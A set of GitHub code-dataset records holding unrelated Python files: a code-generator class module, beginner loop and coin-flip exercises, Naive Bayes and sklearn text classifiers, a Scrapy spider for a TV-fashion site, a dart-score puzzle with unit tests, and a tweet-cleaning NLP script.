1 is foo[], and 2 would be foo[][].\n self.import_path == other.import_path and # from import \n (ignore_description or self.description == other.description) and # if there are additional comments needed.\n True\n )\n # end def compare\n# end class Type\n\n\nclass Import(dict):\n \"\"\" from import \"\"\"\n def __init__(self, path: Union[str, None] = None, name: Union[str, None] = None, is_init: bool = False):\n \"\"\"\n from import \n\n :param path: part where to import from\n :param name: actual name to import\n :param is_init: if this is not `.py`, but `/__init__.py`.\n \"\"\"\n super(Import, self).__init__()\n self.path = path\n self.name = name\n self.is_init = is_init\n # end def __init__\n\n def relative_import_full(self, base_path: Union[str, 'Import']):\n if isinstance(base_path, Import):\n base_path = base_path.path\n # end if\n base_path: str\n\n return relimport(self.full, base_path)\n # end def\n\n def relative_import(self, base_path: Union[str, 'Import']):\n from code_generator_template import split_path\n import_path, import_name = split_path(self.relative_import_full(base_path=base_path))\n return Import(import_path, import_name)\n # end def\n\n\n @property\n def full(self):\n \"\"\" self.path + \".\" + self.name \"\"\"\n if self.path:\n if self.name:\n return self.path + \".\" + self.name\n else:\n return self.path\n # end if\n else:\n if self.name:\n return self.name\n else:\n return \"\"\n # end if\n # end if\n # end def full\n\n def import_statement_from_file(self, base_path: Union[str, None] = None):\n \"\"\"\n :param base_path: If None does absolute import.\n :return:\n \"\"\"\n if base_path is None:\n path = self.full\n else:\n path = self.relative_import_full(base_path=base_path)\n # end if\n from code_generator_template import path_to_import_text\n return path_to_import_text(path)\n # end def\n\n def calculate_filepath(self, folder: str) -> str:\n from code_generator_online import calc_path_and_create_folders\n full_path = ''\n if self.path:\n full_path += self.path\n # end if\n if self.is_init:\n full_path += '.__init__'\n # end if\n if self.name:\n full_path += '.' 
+ self.name\n # end if\n full_path = full_path.strip('.')\n\n return calc_path_and_create_folders(folder, full_path)\n # end def\n\n def __str__(self):\n return self.full\n # end def\n\n def __hash__(self):\n path = self.path if self.path else \"%$none\"\n name = self.name if self.name else \"%$none\"\n return hash(path + name)\n # end def __hash__\n\n \"\"\"\n If it is bigger (+1), equal (0) or less (-1)\n :return: +1, 0 or -1\n :rtype: int\n \"\"\"\n def compare(self, other):\n self_path = \"\" if self.path is None else self.path\n other_path = \"\" if other.path is None else other.path\n if self_path < other_path:\n return -1\n elif self_path > other_path:\n return +1\n elif self.name < other.name:\n return -1\n elif self.name > other.name:\n return +1\n else:\n return 0\n # end if\n # end def compare\n\n \"\"\" self >= other \"\"\"\n def __ge__(self, other):\n return self.compare(other) >= 0\n # end def __ge__\n\n \"\"\" self > other \"\"\"\n def __gt__(self, other):\n return self.compare(other) > 0\n # end def __gt__\n\n \"\"\" self == other \"\"\"\n def __eq__(self, other):\n return self.compare(other) == 0\n # end def __eq__\n\n \"\"\" self <= other \"\"\"\n def __le__(self, other):\n return self.compare(other) <= 0\n # end def __le__\n\n \"\"\" self < other \"\"\"\n def __lt__(self, other):\n return self.compare(other) < 0\n # end def __lt__\n\n \"\"\" self != other \"\"\"\n def __ne__(self, other):\n return self.compare(other) != 0\n # end def __ne__\n\n def __repr__(self):\n return (\n \"Import(\"\n \"path={s.path!r}, name={s.name!r}, is_init={s.is_init!r}\"\n \")\"\n ).format(s=self)\n # end def __repr__\n# end class Import\n\n\nclass FunctionClazz(Clazz):\n def __init__(\n self,\n clazz: Union[None, str] = None,\n import_path: Union[None, 'Import'] = None,\n imports: Union[None, List['Import']] = None,\n parent_clazz: Union[None, 'Type'] = None,\n link: Union[None, str] = None,\n description: Union[None, str] = None,\n parameters: Union[None, List['Variable']] = None,\n keywords: Union[None, List['Variable']] = None,\n function: Union[None, Function] = None,\n ):\n \"\"\"\n Like a class, but contains the original function this was build from.\n :param function: Function\n \"\"\"\n super().__init__(clazz, import_path, imports, parent_clazz, link, description, parameters, keywords)\n assert_type_or_raise(function, Function, None, parameter_name='function')\n self.function = function if function else Function()\n # end def\n# end class\n\nclass CustomClazz(Clazz):\n def __init__(\n self,\n clazz: Union[None, str] = None,\n import_path: Union[None, 'Import'] = None,\n imports: Union[None, List['Import']] = None,\n parent_clazz: Union[None, 'Type'] = None,\n link: Union[None, str] = None,\n description: Union[None, str] = None,\n parameters: Union[None, List['Variable']] = None,\n keywords: Union[None, List['Variable']] = None,\n body: Union[None, 'ReplacementBody'] = None,\n ):\n \"\"\"\n Like a class, but contains a body.\n :param body: ReplacementBody\n \"\"\"\n super().__init__(clazz, import_path, imports, parent_clazz, link, description, parameters, keywords)\n assert_type_or_raise(body, ReplacementBody, None, parameter_name='body')\n self.body = body if body else ReplacementBody()\n # end def\n# end class\n\n\nclass ReplacementBody(object):\n # noinspection PyShadowingBuiltins\n def __init__(\n self,\n before: Union[None, List[str]] = None, # None: keep, empty list: remove, filled list: print every line\n init: Union[None, List[str]] = None, # None: keep, empty list: remove, 
filled list: print every line\n to_array: Union[None, List[str]] = None, # None: keep, empty list: remove, filled list: print every line\n validate_array: Union[None, List[str]] = None, # None: keep, empty list: remove, filled list: print every line\n from_array: Union[None, List[str]] = None, # None: keep, empty list: remove, filled list: print every line\n str: Union[None, List[str]] = None, # None: keep, empty list: remove, filled list: print every line\n repr: Union[None, List[str]] = None, # None: keep, empty list: remove, filled list: print every line\n contains: Union[None, List[str]] = None, # None: keep, empty list: remove, filled list: print every line\n after: Union[None, List[str]] = None, # None: keep, empty list: remove, filled list: print every line\n ):\n self.before = before\n self.init = init\n self.to_array = to_array\n self.validate_array = validate_array\n self.from_array = from_array\n self.str = str\n self.repr = repr\n self.contains = contains\n self.after = after\n # end def\n# end class\n","repo_name":"luckydonald/pytgbot","sub_path":"code_generation/code_generator_classes.py","file_name":"code_generator_classes.py","file_ext":"py","file_size_in_byte":36135,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"7"} +{"seq_id":"22008954999","text":"#while loops run until a certain condition is met\nplayers = 11\n\nwhile players >= 5:\n print(\"The remaining players are\", players)\n players -= 1\n\n#break statement\n#allows code to jump out of a loop whenever a certain condition is met\nnumber = 0\nwhile True:\n print(\"I love candy \" + str(number))\n number +=1\n if number == 7:\n break\n\n#continue statement\n# allows us to jump back to the top of our loop\n# continue keyword ignores all other statements under it and are not run\n'''\nin a team of 20, some numbers are taken and want to display the numbers\nthat are not taken so others don't pick the picked numbers'''\n#taken numbers\nnumTaken = [3,5,7,11,13]\n\nprint(\"Available numbers\")\n\n#loop\nfor i in range (1,21):\n if i in numTaken:\n continue\n print(i)\n ","repo_name":"Njihia413/python-intro","sub_path":"while-loop.py","file_name":"while-loop.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7501986749","text":"import codecs\nfrom collections import Counter\nimport os\nimport glob\nfrom textblob import TextBlob as tb\nimport math\n\ndef tf(word, blob):\n\treturn (float)(blob.words.count(word)) / (float)(len(blob.words))\n\ndef n_containing(word, bloblist):\n\treturn sum(1 for blob in bloblist if word in blob.words)\n\ndef idf(word, bloblist):\n\treturn (float) (math.log(len(bloblist))) / (float)(1 + n_containing(word, bloblist))\n\ndef tfidf(word, blob, bloblist):\n\treturn tf(word, blob) * idf(word, bloblist)\n\n\n\nwords_list = []\nstop = []\nwords_dict = {}\nsplsym = [\"-\",\",\",\"!\",\"#\",\"%\",\"^\",\"&\",\"*\",\"(\",\")\",\"!\", \":\",\".\",\"{\",\"}\", \"[\",\"]\",\">\",\"<\",\"?\",\"/\", \"*\",\"~\", \"@\"]\nspam_dict = {}\nham_dict = {}\nham_total_word_count = 0\nspam_total_word_count = 0\nham_distinct_words = 0\nspam_distinct_words = 0\ndistinct_vocab = {}\n\ndef get_file_list(path_to_spam, path_to_ham):\n\t\n\tspam_bloblist = []\n\tfor file in glob.glob(path_to_spam):\n\t\twords_list[:] = []\n\t\tfile_words = codecs.open(file, \"r\", encoding='utf-8', errors='ignore' )\n\t\tfor line in file_words:\n\t\t\tfor word in line.split():\n\t\t\t\tif not 
word in stop_string and not word in splsym and not word.isdigit():\n\t\t\t\t\twords_list.append(word.lower())\n\t\tblob = tb(' '.join(words_list))\n\t\tspam_bloblist.append(blob)\n\t\t\n\tham_bloblist = []\n\tfor file in glob.glob(path_to_ham):\n\t\twords_list[:] = []\n\t\tfile_words = codecs.open(file, \"r\", encoding='utf-8', errors='ignore' )\n\t\tfor line in file_words:\n\t\t\tfor word in line.split():\n\t\t\t\tif not word in stop_string and not word in splsym and not word.isdigit():\n\t\t\t\t\twords_list.append(word.lower())\n\t\tblob = tb(' '.join(words_list))\n\t\tham_bloblist.append(blob)\n\n\treturn spam_bloblist, ham_bloblist\n\n\n\n\ndef find_likelihood(spam_dict, ham_dict):\n\t# update the module-level counts so accuracy_check can smooth unseen words\n\tglobal spam_total_word_count, ham_total_word_count, distinct_vocab\n\n\tspam_total_word_count = 0\n\n\tfor word in spam_dict:\n\t\tspam_total_word_count += spam_dict[word]\n\n\n\tham_total_word_count = 0\n\n\tfor word in ham_dict:\n\t\tham_total_word_count += ham_dict[word]\n\n\tspam_distinct_words_count = len(spam_dict)\n\tham_distinct_words_count = len(ham_dict)\n\n\tdistinct_vocab = {**spam_dict, **ham_dict}\n\n\tspam_likelihood = {}\n\n\tfor word in distinct_vocab:\n\t\tif word in spam_dict:\n\t\t\tspam_lhood = (spam_dict[word] + 1.0) / (spam_total_word_count + len(distinct_vocab) + 1.0)\n\t\t\tspam_log_likelihood = round(math.log(spam_lhood), 3)\n\t\t\tspam_likelihood[word] = spam_log_likelihood\n\n\tham_likelihood = {}\n\n\tfor word in distinct_vocab:\n\t\tif word in ham_dict:\n\t\t\tham_lhood = (ham_dict[word] + 1.0) / (ham_total_word_count + len(distinct_vocab) + 1.0)\n\t\t\tham_log_likelihood = round(math.log(ham_lhood), 3)\n\t\t\tham_likelihood[word] = ham_log_likelihood\n\n\treturn spam_likelihood, ham_likelihood\n\n\ndef get_dict(spam_bloblist, ham_bloblist):\n\n\tfor i, blob in enumerate(spam_bloblist):\n\t\tfor word in blob.words:\n\t\t\tif word in spam_dict:\n\t\t\t\tspam_dict[word] += 1\n\t\t\telse:\n\t\t\t\tspam_dict[word] = 1\n\n\t\n\tfor i, blob in enumerate(ham_bloblist):\n\t\tfor word in blob.words:\n\t\t\tif word in ham_dict:\n\t\t\t\tham_dict[word] += 1\n\t\t\telse:\n\t\t\t\tham_dict[word] = 1\n\n\treturn spam_dict, ham_dict\n\n\n\n#Calculate posterior probability\n\ndef accuracy_check(blob):\n\n\tcurrent_spam_probability = 0.0\n\tcurrent_ham_probability = 0.0\n\n\tfor word in blob.words:\n\t\tif word in h_likelihood:\n\t\t\tcurrent_ham_probability += h_likelihood[word]\n\t\telse:\n\t\t\tcurrent_ham_probability = current_ham_probability + math.log(1.0 / (ham_total_word_count + len(distinct_vocab) + 1.0))\n\n\t\tif word in s_likelihood:\n\t\t\tcurrent_spam_probability += s_likelihood[word]\n\t\telse:\n\t\t\tcurrent_spam_probability = current_spam_probability + math.log(1.0 / (spam_total_word_count + len(distinct_vocab) + 1.0))\n\n\t# add the LOG priors; adding the raw probabilities would mix scales\n\tcurrent_spam_probability = current_spam_probability + log_prior_spam_probability\n\tcurrent_ham_probability = current_ham_probability + log_prior_ham_probability\n\n\t# print(current_ham_probability)\n\t# print(current_spam_probability)\n\n\n\tif(current_ham_probability > current_spam_probability):\n\t\treturn 1\n\telse:\n\t\treturn 0\n\n\nif __name__ == \"__main__\":\n\tpath = input(\"Please provide path to directory containing datasets: \")\n\n\tpath_to_spam = path + \"/train/spam/*.txt\"\n\tpath_to_ham = path + \"/train/ham/*.txt\"\n\n\tpath_to_spam_test = path + \"/test/spam/*.txt\"\n\tpath_to_ham_test = path + \"/test/ham/*.txt\"\n\n\tstop_words = open(\"Stop_words.txt\").read()\n\tfor word in stop_words.split():\n\t\tstop.append(word)\n\n\tstop_string = set(stop)  # a set, so `in` tests whole words instead of substrings
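\n\n\t# Naive Bayes recap: the likelihoods from find_likelihood use Laplace\n\t# (add-one) smoothing,\n\t#   P(word | class) = (count(word, class) + 1) / (total_words(class) + |vocab| + 1)\n\t# e.g. a word seen 3 times among 1000 spam tokens with a 500-word vocabulary\n\t# contributes log((3 + 1) / (1000 + 500 + 1)) to the spam posterior.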
\n\n\tspam_bloblist, ham_bloblist = get_file_list(path_to_spam, path_to_ham)\n\n\t#print(spam_bloblist)\n\n\tspam_dict, ham_dict = get_dict(spam_bloblist, ham_bloblist)\n\n\ts_likelihood, h_likelihood = find_likelihood(spam_dict, ham_dict)\n\n\tprior_spam_probability = (float)(len(spam_bloblist) * 1.0) / (float)(len(spam_bloblist) + len(ham_bloblist))\n\n\tlog_prior_spam_probability = math.log(prior_spam_probability)\n\n\tprint(prior_spam_probability)\n\n\tprior_ham_probability = 1.0 - prior_spam_probability\n\n\tlog_prior_ham_probability = math.log(prior_ham_probability)\n\n\tprint(prior_ham_probability)\n\n\tham_correct = 0.0\n\tnh = 0\n\tfor i,blob in enumerate(ham_bloblist):\n\t\tnh = nh+1\n\t\tif accuracy_check(ham_bloblist[i]) == 1:\n\t\t\tham_correct += 1.0\n\n\n\tspam_correct = 0.0\n\tns = 0\n\tfor i,blob in enumerate(spam_bloblist):\n\t\tns = ns+1\n\t\tif accuracy_check(spam_bloblist[i]) == 0:\n\t\t\tspam_correct += 1.0\n\n\t#print(len(ham_bloblist))\n\tham_accuracy = (ham_correct/nh) * 100\n\n\tspam_accuracy = (spam_correct/ns) * 100\n\n\tprint(\"Ham accuracy is: \" + str(ham_accuracy))\n\n\tprint(\"Spam accuracy is: \" + str(spam_accuracy))\n\n\tspam_bloblist[:] = []\n\n\tham_bloblist[:] = []\n\n\tham_accuracy = 0.0\n\n\tspam_accuracy = 0.0\n\n\tspam_bloblist, ham_bloblist = get_file_list(path_to_spam_test, path_to_ham_test)\n\n\n\tham_correct = 0.0\n\tnh = 0\n\tfor i,blob in enumerate(ham_bloblist):\n\t\tnh = nh+1\n\t\tif accuracy_check(ham_bloblist[i]) == 1:\n\t\t\tham_correct += 1.0\n\n\n\tspam_correct = 0.0\n\tns = 0\n\tfor i,blob in enumerate(spam_bloblist):\n\t\tns = ns+1\n\t\tif accuracy_check(spam_bloblist[i]) == 0:\n\t\t\tspam_correct += 1.0\n\n\t#print(len(ham_bloblist))\n\tham_accuracy = (ham_correct/nh) * 100\n\n\tspam_accuracy = (spam_correct/ns) * 100\n\n\tprint(\"Ham accuracy is: \" + str(ham_accuracy))\n\n\tprint(\"Spam accuracy is: \" + str(spam_accuracy))\n\n\n","repo_name":"alchemist009/ML_musings","sub_path":"NaiveBayes/NaiveBayes.py","file_name":"NaiveBayes.py","file_ext":"py","file_size_in_byte":6072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"1378667269","text":"#coding=gbk\r\nimport os # used to read files\r\nimport jieba # used for Chinese word segmentation\r\nimport pandas\r\nimport numpy\r\nfrom sklearn.feature_extraction.text import TfidfTransformer\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n# preprocess tokenizes one text document and returns the tokens as a space-separated string\r\ndef preprocess(path_name):\r\n    text_with_spaces = \"\"\r\n    textfile = open(path_name, \"r\", encoding=\"gb18030\").read()\r\n    textcut = jieba.cut(textfile)\r\n    for word in textcut:\r\n        text_with_spaces += word+\" \"\r\n    return text_with_spaces\r\n\r\n\r\n# loadtrainset tokenizes every text document under a folder and loads them as a training set;\r\n# returns the processed texts and the class label of each text\r\ndef loadtrainset(path, classtag):\r\n    allfiles=os.listdir(path)\r\n    processed_textset = []\r\n    allclasstags = []\r\n    for thisfile in allfiles:\r\n        path_name = path+\"/\"+thisfile\r\n        processed_textset.append(preprocess(path_name))\r\n        allclasstags.append(classtag)\r\n    #print(processed_textset)\r\n    #print(allclasstags)\r\n    return processed_textset, allclasstags\r\n\r\n\r\n# load the data and split off a held-out test set per category\r\nfemale_dataset, female_class = loadtrainset(\"D:/data/女性\", \"女性\")\r\nX1_train, X1_test, y1_train, y1_test = train_test_split(female_dataset, female_class, test_size=0.2)\r\ngym_dataset, gym_class = loadtrainset(\"D:/data/体育\", \"体育\")\r\nX2_train, 
X2_test, y2_train, y2_test = train_test_split(gym_dataset, gym_class, test_size=0.2)\r\nliterature_dataset, literature_class=loadtrainset(\"D:/data/文学出版\", \"文学\")\r\nX3_train, X3_test, y3_train, y3_test = train_test_split(literature_dataset, literature_class, test_size=0.2)\r\ncampus_dataset, campus_class=loadtrainset(\"D:/data/校园\", \"校园\")\r\nX4_train, X4_test, y4_train, y4_test = train_test_split(campus_dataset, campus_class, test_size=0.2)\r\n\r\n\r\nintegrated_train_data = X1_train+X2_train+X3_train+X4_train\r\nclasstags_list = y1_train+y2_train+y3_train+y4_train\r\n\r\ncount_vector = CountVectorizer()\r\n# converts the words in the texts into a term-frequency matrix; element a[i][j] is the frequency of word j in document i\r\nvector_matrix = count_vector.fit_transform(integrated_train_data)\r\n\r\n# tf-idf weighting model\r\ntrain_tfidf = TfidfTransformer(use_idf=False).fit_transform(vector_matrix)\r\n# converts the term-frequency matrix into a weight matrix; each feature value is a word's TF-IDF weight\r\n\r\n# train the MultinomialNB classifier\r\nmnb = MultinomialNB()\r\nclf = mnb.fit(train_tfidf,classtags_list)\r\n\r\n\r\n# testing\r\ntestset = X1_test+X2_test+X3_test+X4_test\r\ntestclass = y1_test+y2_test+y3_test+y4_test\r\n#testset.append(preprocess(\"F:/Datasets/testdata/testdata.txt\"))\r\n#testset.append(\"学生 硕士 毕业生 高校 课程 大学\")\r\nnew_count_vector = count_vector.transform(testset)\r\nnew_tfidf= TfidfTransformer(use_idf=False).fit_transform(new_count_vector)\r\npredict_result = clf.predict(new_tfidf) # prediction results\r\n\r\nprint(predict_result)\r\nprint('Prediction accuracy', mnb.score(new_tfidf, testclass))\r\n\r\n","repo_name":"zhangwenyuan919/ML_DL_assignment","sub_path":"ML_assignment/doc_categorize.py","file_name":"doc_categorize.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"15139537119","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport logging\nfrom pymongo import MongoClient\nimport json\nimport codecs\nfrom ..items import XinshuiItem\n\nclass WornontvSpider(scrapy.Spider):\n    name = \"wornontv\"\n    allowed_domains = [\"wornontv.net\"]\n\n    def __init__(self):\n        self.start_urls = []\n        for t in range(18000, 30000):\n            self.start_urls.append(\"http://wornontv.net/%s/\" % t)\n        # f_out = open(\"wornontv.txt\", \"w\")\n\n    # def parse(self, response):\n    #     links = response.xpath(\"//div[@class='pure-g showlist']/div/ul/li/a\")\n    #     for link in links:\n    #         url = link.xpath(\"@href\").extract()[0]\n    #         title = link.xpath(\"text()\").extract()[0]\n    #         # print url, title\n    #         f_out.write(title + \"|\" + url + \"\\n\")\n    def parse(self, response):\n        item = XinshuiItem()\n        body = response.xpath(\"//div[@class='single-inner box']\")\n        img = body.xpath(\"//div['content-image']/p/img\")\n        breadcrumbs = body.xpath(\"//ul[@class='breadcrumbs']/li/a/span/text()\").extract()\n        item[\"_id\"] = response.url.split(\"/\")[-2]\n        item['src'] = \"tv\"\n        item['des'] = body.xpath(\"//div[@class='outfit-details-box']/h1/text()\").extract()[0]\n        item['show'] = breadcrumbs[1]\n        item['episode'] = breadcrumbs[2]\n        content_a = body.xpath(\"//span[@class='metabox-content pure-u-4-5']/a/text()\").extract()\n        content_t = body.xpath(\"//span[@class='metabox-content pure-u-4-5']/text()\").extract()\n        item['episode_name'] = content_a[0].strip()\n        item['character'] = content_a[1].strip()\n        item['actor'] = content_t[2].split(\"played by\")[1].strip()\n        item['post_time'] = content_t[3].strip()\n        item['img'] = img.xpath(\"@src\").extract()[0]\n        if len(body.xpath(\"//div[@class='outfit-details-box']/p/text()\").extract()) > 0:\n            item[\"found\"] = False\n            yield item\n        else:\n            item[\"found\"] = True\n            
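# Outfit identified: record the brand and product type, then split the
            # product grid into exact matches vs. visually similar items based on
            # each thumbnail's CSS class (\"exact-match\" or not).
            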
item['brand'] = body.xpath(\"//span[@class='pure-u-4-5 outfit-details-content']/text()\").extract()[0].split(\"by\")[0].strip()\n            item['product_type'] = body.xpath(\"//span[@class='pure-u-1-5 outfit-details-title']/strong/text()\").extract()[0].split(\":\")[0].strip()\n            products = body.xpath(\"//div[@class='product-item ']\")\n            match = []\n            similar = []\n            for p in products:\n                product = {\n                    \"img\": p.xpath(\"span/img/@src\").extract()[0],\n                    \"url\": p.xpath(\"a/@href\").extract()[0],\n                    \"title\": p.xpath(\"a/@title\").extract()[0],\n                    \"price\": p.xpath(\"a/span[@class='product-price']/text()\").extract()[0],\n                    \"store\": p.xpath(\"a/span[@class='product-store']/text()\").extract()[0]\n                }\n                cat = p.xpath(\"a/img/@class\").extract()[0]\n                if cat == \"exact-match\":\n                    match.append(product)\n                else:\n                    similar.append(product)\n            item[\"match\"] = match\n            item[\"similar\"] = similar\n            yield item\n\n","repo_name":"neozhangthe1/scraper","sub_path":"framedrop/wornontv/xinshui/spiders/wornontv.py","file_name":"wornontv.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"35413437508","text":"import unittest\nimport re\n\nfrom utils import CommonUtils\n\n\nclass Solution:\n    \"\"\" [Round 1] Dart Game\n    Kakao Talk's game division decided to release a dart game as a new service for the second half of the year.\n    Darts is a game where you throw three darts at a board and compete on the total score, so anyone can enjoy it easily.\n    Muji, a new hire recognized for coding skill, was put in charge of the score calculation logic, the core of the game.\n    The scoring rules of the dart game are as follows.\n    A dart game consists of a total of three chances.\n    \n    1. Each chance scores from 0 up to 10 points.\n    2. Along with the score there are Single (S), Double (D) and Triple (T) areas;\n       hitting one raises the score to the 1st, 2nd or 3rd power (score**1, score**2, score**3).\n    3. As options there are a star prize (*) and a consolation prize (#); a star (*) doubles the current\n       score and the score obtained just before it, while a consolation (#) negates the current score.\n    4. A star (*) can appear on the first chance too. In that case only that first star (*) score is doubled. (see example 4)\n    5. The effect of a star (*) stacks with other stars (*). In that case the stacked star (*) score is multiplied by 4. (see example 4)\n    6. The effect of a star (*) stacks with a consolation (#). In that case the stacked consolation (#) score is multiplied by -2. (see example 5)\n    7. Single (S), Double (D) and Triple (T) each exist once per score.\n    8. Star (*) and consolation (#) can each appear at most once per score, and may be absent.\n    \n    Given a string made up of the integers 0-10 and the characters S, D, T, *, #, write a function that returns the total score.\n    \n    Input format\n    A string of three sets of score|bonus|[option].\n    e.g. 1S2D*3T\n    \n    The score is an integer from 0 to 10.\n    The bonus is one of S, D, T.\n    The option is * or #, and may be omitted.\n\n    Output format\n    Print the integer total of the scores from the three chances.\n    e.g. 37\n    \n    Examples\n    #   dartResult   answer   explanation\n    1   1S2D*3T      37       1**1 * 2 + 2**2 * 2 + 3**3\n    2   1D2S#10S     9        1**2 + 2**1 * (-1) + 10**1\n    3   1D2S0T       3        1**2 + 2**1 + 0**3\n    4   1S*2T*3S     23       1**1 * 2 * 2 + 2**3 * 2 + 3**1\n    5   1D#2S*3S     5        1**2 * (-1) * 2 + 2**1 * 2 + 3**1\n    6   1T2D3D#      -4       1**3 + 2**2 + 3**2 * (-1)\n    7   1D2S3T*      59       1**2 + 2**1 * 2 + 3**3 * 2\n    \"\"\"\n    \n    def my_solution(self, dartResult: str) -> int:\n        num = ''\n        check_count = -1\n        scores = [0] * 3\n        \n        for char in dartResult:\n            \n            if char.isdigit():\n                num += char\n                continue\n            \n            if num:\n                check_count += 1\n                scores[check_count] = int(num)\n                num = ''\n            \n            if char == 'S':\n                scores[check_count] = scores[check_count] ** 1\n                continue\n            \n            if char == 'D':\n                scores[check_count] = scores[check_count] ** 2\n                continue\n            \n            if char == 'T':\n                scores[check_count] = scores[check_count] ** 3\n                continue\n            \n            if char == '*':\n                scores[check_count] = scores[check_count] * 2\n                \n                if check_count > 0:\n                    scores[check_count - 1] = scores[check_count - 1] * 2\n                \n                continue\n            \n            if char == '#':\n                scores[check_count] = scores[check_count] * -1\n        \n        return sum(scores)\n    
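\n    # The regex-based variant below parses each throw into a (score, bonus, option)\n    # tuple, e.g. '1S2D*3T' -> [('1', 'S', ''), ('2', 'D', '*'), ('3', 'T', '')].\n    # A '*' also doubles the previous throw; by the time it is applied, dart[i - 1]\n    # already holds that throw's integer score from the previous loop iteration.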
\n    def best_solution_i_think(self, dartResult: str) -> int:\n        bonus = {'S': 1, 'D': 2, 'T': 3}\n        option = {'' : 1, '*': 2, '#': -1}\n        p = re.compile('(\\d+)([SDT])([*#]?)')\n        dart = p.findall(dartResult)\n        \n        for i in range(len(dart)):\n            if dart[i][2] == '*' and i > 0:\n                dart[i - 1] *= 2\n            \n            dart[i] = int(dart[i][0]) ** bonus[dart[i][1]] * option[dart[i][2]]\n        \n        return sum(dart)\n    \n    def other_solution(self, dartResult: str) -> int:\n        point = []\n        answer = []\n        \n        dartResult = dartResult.replace('10', 'k')\n        point = ['10' if i == 'k' else i for i in dartResult]\n        \n        i = -1\n        sdt = ['S', 'D', 'T']\n        \n        for j in point:\n            \n            if j in sdt:\n                answer[i] = answer[i] ** (sdt.index(j) + 1)\n            \n            elif j == '*':\n                answer[i] = answer[i] * 2\n                \n                if i != 0:\n                    answer[i - 1] = answer[i - 1] * 2\n            \n            elif j == '#':\n                answer[i] = answer[i] * (-1)\n            \n            else:\n                answer.append(int(j))\n                i += 1\n        \n        return sum(answer)\n\n\nclass TestSolution(unittest.TestCase):\n    \n    def setUp(self) -> None:\n        self.solution = Solution()\n        \n        self.case = [\n            '1S2D*3T',\n            '1D2S#10S',\n            '1D2S0T',\n            '1S*2T*3S',\n            '1D#2S*3S',\n            '1T2D3D#',\n            '1D2S3T*'\n        ]\n        \n        self.result = [\n            37,\n            9,\n            3,\n            23,\n            5,\n            -4,\n            59\n        ]\n    \n    @CommonUtils.logging_time\n    def test_my_solution(self):\n        for index in range(len(self.case)):\n            result = self.solution.my_solution(self.case[index])\n            \n            self.assertEqual(\n                self.result[index],\n                result\n            )\n\n    @CommonUtils.logging_time\n    def test_best_solution_i_think(self):\n        for index in range(len(self.case)):\n            result = self.solution.best_solution_i_think(self.case[index])\n            \n            self.assertEqual(\n                self.result[index],\n                result\n            )\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"pm1100tm/algorithm-practice-python","sub_path":"programmers/lv_one_047.py","file_name":"lv_one_047.py","file_ext":"py","file_size_in_byte":6457,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"18304913766","text":"import pandas as pd\nimport re\nimport spacy\nimport nltk\n\n# import csv\ndata = pd.read_csv('data-filtered.csv')\n\n# group the strings\nstring = \" \".join(data['text'])\n\n############### 
Cleaning data process ##################\n################## FOR ENGLISH #######################\n########################################################\nspc_en = spacy.load(\"en_core_web_sm\")\n\n#example\n#text = \"He determined to drop his litigation with the monastry, and relinguish his claims to the wood-cuting and fishery rihgts at once. He was the more ready to do this becuase the rights had become much less valuable, and he had indeed the vaguest idea where the wood and river in question were.\"\n\ndef clean_text_en(text):\n    # Remove characters that aren't letters and run the \"tokenization\" process\n    # (note: [A-Za-z], not [A-z], which would also match punctuation like [ and ^)\n    letters = re.findall(r'\\\b[A-Za-zÀ-úü]+\\\b', text.lower())\n    \n    # Defining stopwords\n    stopwords = nltk.corpus.stopwords.words('english')\n    #stopwords = set(stopwords.words('english'))\n    meaningful_words = [w for w in letters if w not in stopwords]\n    meaningful_words_string = \" \".join(meaningful_words)\n    \n    # Creating the object spacy\n    spc_letters = spc_en(meaningful_words_string)\n    \n    # Lemmatization \n    tokens = [token.lemma_ if token.pos_ == 'VERB' else str(token) for token in spc_letters]\n    \n    return tokens\n\nstrg = []\n# Generate tokens\nfor i in data['text']:\n    words = clean_text_en(i)\n    strg += [\", \".join(words)]\n    \ndata['words'] = strg\ndata.to_csv('data-tweets-nlp.csv')\n","repo_name":"GabrielaNara/translating-soundscape-descriptors","sub_path":"3 - Filter_ token.py","file_name":"3 - Filter_ token.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"9981604535","text":"import random\n\n# counts streaks of six identical flips across 10,000 experiments\n\ndef flipCoin():\n    numberOfStreaks = 0\n    for experimentNumber in range(10000):\n        if experimentNumber == 626:\n            print(\"Ohana means family.\")\n        \n        # create a list of 100 'heads' or 'tails' values\n        flips = []\n        for i in range(100):\n            flips.append(random.randint(0, 1))\n        \n        # check if there is a streak: count each run of six or more\n        # identical flips exactly once, when its length reaches six\n        streak = 1\n        for i in range(1, 100):\n            if flips[i] == flips[i - 1]:\n                streak += 1\n                if streak == 6:\n                    numberOfStreaks += 1\n            else:\n                streak = 1\n    return numberOfStreaks\n\ndef main():\n    streaksNum = flipCoin()\n    print(\"Number of streaks with six flips: \" + str(streaksNum))\n    print(\"Percentage of all flips included in those streaks: \", end=\"\")\n    print(str((streaksNum * 6) / 10000) + \"%\")\n\nif __name__ == \"__main__\":\n    main()\n\n# deviated from challenge's provided output template \n# print('Chance of streak: %s%%' % (numberOfStreaks / 100))\n","repo_name":"embowman/automate-the-boring-stuff-with-python","sub_path":"coin-flip-streaks.py","file_name":"coin-flip-streaks.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
